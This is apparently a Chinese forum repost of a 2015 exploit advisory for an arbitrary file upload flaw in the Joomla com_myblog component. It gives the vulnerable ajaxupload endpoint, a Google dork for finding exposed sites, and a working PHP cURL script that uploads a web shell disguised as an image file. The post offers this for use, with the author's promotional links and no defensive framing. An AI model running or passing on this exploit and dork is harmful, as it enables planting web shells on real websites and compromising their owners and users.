本帖最后由 90_ 于 2015-7-21 17:11 编辑
[+] Title : Joomla com_Myblog Exploit Arbitrary File Upload Vulnerability
----------------------------------------------------
[+] Author : Back-DOOR
----------------------------------------------------
[+] Exploit by : Back-DOOR
[+] Dork google : inurl:/components/com_myblog/
----------------------------------------------------
[+] Contact : https://facebook.com/Backdoor.ma
[+] Like : https://fb.com/BaCkDoOr.HaCkInG
[+] youtube chaine : https://www.youtube.com/user/BackDOOR8100/videos
[PHP] 纯文本查看 复制代码
exploit Vul : /index.php?option=com_myblog&task=ajaxupload
Vuln code : {error: 'No file has been uploaded.', msg: '' }
Exploiter :
***************************************************************************************************
<?php
$uploadfile="yourshell.php.xxxjpg";
$ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
*************************************************************************************************** | 
发表于 2015-7-21 17:09:25
发表于 2015-7-23 15:49:12
